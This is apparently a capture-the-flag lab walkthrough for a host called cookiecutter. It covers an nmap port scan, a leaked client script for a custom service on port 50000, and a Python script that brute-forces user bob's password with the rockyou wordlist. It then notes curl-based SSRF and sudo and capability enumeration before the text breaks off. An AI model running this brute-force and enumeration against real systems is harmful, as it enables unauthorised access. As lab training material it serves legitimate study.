$ nmap -p- --min-rate 3000 192.168.160.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-13 14:13 +08
Nmap scan report for 192.168.160.112
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
50000/tcp open ibm-db2
Web Enumeration -> Brute Force
Port 80 just shows a countdown:
If we view the page source, there's this bit here:
Here's the script:
#!/usr/bin/python3
import socket
HOST="127.0.0.1"
PORT=50000
s = None
def connect():
global s
s = socket.socket()
s.connect((HOST,PORT))
username = b"bob"
password = b"[REDACTED]"
# Example:
# 1\x00admin\x00password\x00
def login():
connect()
buf = b""
buf += b"1"
buf += b"\x00"
buf += username
buf += b"\x00"
buf += password
buf += b"\x00"
s.send(buf)
r = s.recv(4096)
data = r.split(b"\x00")
s.close()
if int(data[0]) == 1:
return data[1].decode()
else:
return None
# Example:
# 2\x00commands\x00
def send_command(uuid, cmd, *args):
connect()
buf = b""
buf += b"2"
buf += b"\x00"
buf += uuid.encode()
buf += b"\x00"
buf += cmd.encode()
buf += b"\x00"
if args != ():
for x in args:
buf += x.encode()
buf += b"\x00"
s.send(buf)
r = s.recv(25600)
data = r.split(b"\x00")
s.close()
if int(data[0]) == 1:
return data[1].decode()
else:
return None
#TODO program some of the example functions that we can show to the client
Port 50000 is running an application that uses this script. We know that the user is bob, but the password has been removed. As such, we can brute force his password using an adaptation of the original script:
#!/usr/bin/python3
import socket
import base64
import sys
HOST="192.168.160.112"
PORT=50000
username = b"bob"
f = open('/usr/share/wordlists/rockyou.txt','r')
for passw in f:
attempt = passw.strip('\n').encode()
print(f"Trying {attempt}...")
s = socket.socket()
s.connect((HOST,PORT))
buf = b""
buf += b"1"
buf += b"\x00"
buf += username
buf += b"\x00"
buf += attempt
buf += b"\x00"
s.send(buf)
r = s.recv(4096)
data = r.split(b"\x00")
s.close()
print(data)
Eventually, it would find the correct password of cookie1.
It seems that we can only run id and curl. Since curl is open, we can try to read some files or do SSRF. Running curl on localhost returns a base64 encoded string:
Using this password, we cannot su to root, but we can check sudo privileges:
bob@cookiecutter:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on cookiecutter:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on cookiecutter:
(bob : python_admin) /usr/bin/admin_python3
We could run a special type of Python. I wanted to see what was different about this binary, so I used getcap and saw that this can run setuid:
